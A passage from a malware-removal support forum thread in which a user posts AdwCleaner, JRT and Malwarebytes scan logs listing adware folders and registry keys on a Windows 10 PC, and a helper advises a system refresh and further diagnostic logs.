########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[C1].txt - [8134 bytes] ##########
 

Link to post
Share on other sites

 AdwCleaner v5.101 - Logfile created 08/03/2016 at 09:47:39
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [server]
# Operating system : Windows 10 Home  (x64)
# Username : Lexi - DURABLE
# Running from : C:\Users\Lexi\Downloads\AdwCleaner.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

Folder Found : C:\Program Files (x86)\Coupons
Folder Found : C:\Program Files (x86)\File Type Helper
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Found : C:\Users\Lexi\AppData\LocalLow\Conduit
Folder Found : C:\Users\Lexi\AppData\Roaming\pccustubinstaller
Folder Found : C:\WINDOWS\SysWOW64\C2MP

***** [ Files ] *****

File Found : C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage
File Found : C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_cdncache-a.akamaihd.net_0.localstorage-journal

***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

Task Found : {7E7D0F47-0A78-0E0A-7A11-047E0C7E1178}

***** [ Registry ] *****

Key Found : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DB507187-9746-458C-97DA-C458131EEDE7}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{07B18EAB-A523-4961-B6BB-170DE4475CCA}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3DC201FB-E9C9-499C-A11F-23C360D7C3F8}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{08858AF6-42AD-4914-95D2-AC3AB0DC8E28}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68AF847F-6E91-45DD-9B68-D6A12C30E5D7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{01947140-417F-46B6-8751-A3A2B8345E1A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{07B18EAA-A523-4961-B6BB-170DE4475CCA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{07B18EAC-A523-4961-B6BB-170DE4475CCA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{1093995A-BA37-41D2-836E-091067C4AD17}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{120927BF-1700-43BC-810F-FAB92549B390}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{17DE5E5E-BFE3-4E83-8E1F-8755795359EC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{1F52A5FA-A705-4415-B975-88503B291728}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{247A115F-06C2-4FB3-967D-2D62D3CF4F0A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2E3537FC-CF2F-4F56-AF54-5A6A3DD375CC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2E9937FC-CF2F-4F56-AF54-5A6A3DD375CC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E1656ED-F60E-4597-B6AA-B6A58E171495}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E53E2CB-86DB-4A4A-8BD9-FFEB7A64DF82}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E720451-B472-4954-B7AA-33069EB53906}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E720453-B472-4954-B7AA-33069EB53906}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63D0ED2B-B45B-4458-8B3B-60C69BBBD83C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63D0ED2D-B45B-4458-8B3B-60C69BBBD83C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6E74766C-4D93-4CC0-96D1-47B8E07FF9CA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{72EE7F04-15BD-4845-A005-D6711144D86A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{741DE825-A6F0-4497-9AA6-8023CF9B0FFF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D291-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D293-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D295-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D297-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{819FFE21-35C7-4925-8CDA-4E0E2DB94302}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{8E9CF769-3D3B-40EB-9E2D-76E7A205E4D2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{90449521-D834-4703-BB4E-D3AA44042FF8}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{991AAC62-B100-47CE-8B75-253965244F69}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A626CDBD-3D13-4F78-B819-440A28D7E8FC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{BBABDC90-F3D5-4801-863A-EE6AE529862D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{CF54BE1C-9359-4395-8533-1657CF209CFE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D6FF3684-AD3B-48EB-BBB4-B9E6C5A355C1}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DB507187-9746-458C-97DA-C458131EEDE7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DE38C398-B328-4F4C-A3AD-1B5E4ED93477}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E342AF55-B78A-4CD0-A2BB-DA7F52D9D25E}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E342AF55-B78A-4CD0-A2BB-DA7F52D9D25F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E79DFBC9-5697-4FBD-94E5-5B2A9C7C1612}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E79DFBCB-5697-4FBD-94E5-5B2A9C7C1612}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EB9E5C1C-B1F9-4C2B-BE8A-27D6446FDAF8}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F87D7FB5-9DC5-4C8C-B998-D8DFE02E2978}
Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\BackgroundContainer
Key Found : HKCU\Software\FunWebProducts
Key Found : HKCU\Software\MyWebSearch
Key Found : HKCU\Software\Zugo
Key Found : HKCU\Software\AppDataLow\Toolbar
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Found : HKCU\Software\AppDataLow\Software\MyWebSearch
Key Found : HKLM\SOFTWARE\FocusInteractive
Key Found : HKLM\SOFTWARE\Fun Web Products
Key Found : HKLM\SOFTWARE\MyWebSearch
Key Found : HKLM\SOFTWARE\PIP
Key Found : HKLM\SOFTWARE\W3I
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}
Key Found : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
Key Found : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}
Data Found : [x64] HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows [AppInit_DLLs] - C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com

***** [ Web browsers ] *****


*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [7141 bytes] - [08/03/2016 09:47:39]

########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [7234 bytes] ##########
# AdwCleaner v5.101 - Logfile created 09/03/2016 at 16:26:08
# Updated 07/03/2016 by Xplode
# Database : 2016-03-08.1 [server]
# Operating system : Windows 10 Home  (x64)
# Username : Lexi - DURABLE
# Running from : C:\Users\Lexi\Downloads\AdwCleaner.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****

Folder Found : C:\Program Files (x86)\Coupons
Folder Found : C:\Program Files (x86)\File Type Helper
Folder Found : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Coupons
Folder Found : C:\Users\Lexi\AppData\Roaming\pccustubinstaller
Folder Found : C:\WINDOWS\SysWOW64\C2MP

***** [ Files ] *****


***** [ DLL ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****

Key Found : HKLM\SOFTWARE\Classes\CLSID\{3C471948-F874-49F5-B338-4F214A2EE0B1}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9AFB8248-617F-460D-9366-D71CDEDA3179}
Key Found : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Classes\Interface\{DB507187-9746-458C-97DA-C458131EEDE7}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{07B18EAB-A523-4961-B6BB-170DE4475CCA}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{3DC201FB-E9C9-499C-A11F-23C360D7C3F8}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{08858AF6-42AD-4914-95D2-AC3AB0DC8E28}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{68AF847F-6E91-45DD-9B68-D6A12C30E5D7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{01947140-417F-46B6-8751-A3A2B8345E1A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{07B18EAA-A523-4961-B6BB-170DE4475CCA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{07B18EAC-A523-4961-B6BB-170DE4475CCA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{1093995A-BA37-41D2-836E-091067C4AD17}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{120927BF-1700-43BC-810F-FAB92549B390}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{17DE5E5E-BFE3-4E83-8E1F-8755795359EC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{1F52A5FA-A705-4415-B975-88503B291728}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{247A115F-06C2-4FB3-967D-2D62D3CF4F0A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2E3537FC-CF2F-4F56-AF54-5A6A3DD375CC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{2E9937FC-CF2F-4F56-AF54-5A6A3DD375CC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E1656ED-F60E-4597-B6AA-B6A58E171495}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E53E2CB-86DB-4A4A-8BD9-FFEB7A64DF82}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E720451-B472-4954-B7AA-33069EB53906}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{3E720453-B472-4954-B7AA-33069EB53906}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63D0ED2B-B45B-4458-8B3B-60C69BBBD83C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{63D0ED2D-B45B-4458-8B3B-60C69BBBD83C}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{6E74766C-4D93-4CC0-96D1-47B8E07FF9CA}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{72EE7F04-15BD-4845-A005-D6711144D86A}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{741DE825-A6F0-4497-9AA6-8023CF9B0FFF}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D291-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D293-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D295-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{7473D297-B7BB-4F24-AE82-7E2CE94BB6A9}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{819FFE21-35C7-4925-8CDA-4E0E2DB94302}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{8E9CF769-3D3B-40EB-9E2D-76E7A205E4D2}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{90449521-D834-4703-BB4E-D3AA44042FF8}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{991AAC62-B100-47CE-8B75-253965244F69}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{A626CDBD-3D13-4F78-B819-440A28D7E8FC}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{BBABDC90-F3D5-4801-863A-EE6AE529862D}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{CF54BE1C-9359-4395-8533-1657CF209CFE}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{D6FF3684-AD3B-48EB-BBB4-B9E6C5A355C1}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DB507187-9746-458C-97DA-C458131EEDE7}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{DE38C398-B328-4F4C-A3AD-1B5E4ED93477}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E342AF55-B78A-4CD0-A2BB-DA7F52D9D25E}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E342AF55-B78A-4CD0-A2BB-DA7F52D9D25F}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E79DFBC9-5697-4FBD-94E5-5B2A9C7C1612}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{E79DFBCB-5697-4FBD-94E5-5B2A9C7C1612}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{EB9E5C1C-B1F9-4C2B-BE8A-27D6446FDAF8}
Key Found : [x64] HKLM\SOFTWARE\Classes\Interface\{F87D7FB5-9DC5-4C8C-B998-D8DFE02E2978}
Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\BackgroundContainer
Key Found : HKCU\Software\FunWebProducts
Key Found : HKCU\Software\MyWebSearch
Key Found : HKCU\Software\Zugo
Key Found : HKCU\Software\AppDataLow\Toolbar
Key Found : HKCU\Software\AppDataLow\Software\BackgroundContainer
Key Found : HKCU\Software\AppDataLow\Software\MyWebSearch
Key Found : HKLM\SOFTWARE\FocusInteractive
Key Found : HKLM\SOFTWARE\Fun Web Products
Key Found : HKLM\SOFTWARE\MyWebSearch
Key Found : HKLM\SOFTWARE\PIP
Key Found : HKLM\SOFTWARE\W3I
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{739126B3-1B80-4F9F-8D59-312A19633E1A}_is1
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}
Key Found : HKLM\SOFTWARE\Classes\Installer\Features\4E30E037E0535E84D9E3349209D354D4
Key Found : HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : [x64] HKLM\SOFTWARE\Classes\Installer\Products\4E30E037E0535E84D9E3349209D354D4
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\conduit.com

***** [ Web browsers ] *****

[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : search.mywebsearch.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : websearch.ask.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : ask.com__
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : search.conduit.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : wayfair.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : ask.com
[C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Web data] [search Provider] Found : aol.com

*************************

C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [14867 bytes] - [08/03/2016 09:47:39]

########## EOF - C:\Program Files (x86)\AdwCleaner\AdwCleaner[s1].txt - [14961 bytes] ##########
 

Link to post
Share on other sites

JRT

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




File System: 8

Successfully deleted: C:\Users\Lexi\AppData\Local\Google\Chrome\User Data\Default\Extensions\lbfehkoinhhcknnbdgnnmjhiladcgbol (Folder)
Successfully deleted: C:\Users\Lexi\AppData\Roaming\new version available (Folder)
Successfully deleted: C:\WINDOWS\couponprinter.ocx (File)
Successfully deleted: C:\WINDOWS\wininit.ini (File)
Successfully deleted: C:\WINDOWS\prefetch\DRIVERUPDATEUI.EXE-44B94CD5.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\FREEAVIMPEGWMVMP4FLVVIDEOJOIN-BC221BAB.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\FREEAVIMPEGWMVMP4FLVVIDEOJOIN-C522B191.pf (File)
Successfully deleted: C:\WINDOWS\prefetch\GOOGLETOOLBARNOTIFIER.EXE-7AE0A20E.pf (File)

user_pref(browser.urlbar.suggest.searches, true);



Registry: 2

Successfully deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\\GoogleChromeAutoLaunch_AC2BF96DE3E4AFDBE25411FD527B2AD1 (Registry Value)
Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Wed 03/09/2016 at 20:33:09.60
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 

Link to post
Share on other sites

Just in case the malware bytes logs are of concern to Malwarebytes - here is the log from History that corresponds with post 16.  As you can see the timestamps are not consistant even though it was a single scan and the data is not in agreement.

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 3/9/2016
Scan Time: 6:58 PM
Logfile:
Administrator: Yes

Version: 0.0.0.0000
Malware Database: v2016.03.09.06
Rootkit Database: v2016.02.27.01
License: Trial
Malware Protection: Enabled
Malicious Website Protection: Enabled
Self-protection: Disabled

OS: Windows 10
CPU: x64
File System: NTFS
User: Lexi

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 420528
Time Elapsed: 39 min, 47 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)

Link to post
Share on other sites

Yes please run refresh, reboot your system when complete. As you have noted there will be programs to re-install when the refresh is completed, a list should be saved to your desktop when complete.... When Refresh is completed please comeback and let me know, also run FRST and post the two fresh logs, FRST.txt and Addition.txt.

 

Your system at present was awash with many issues, i`d like to try and help you stop that happening again.....

 

Thank you,

 

Kevin.....

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.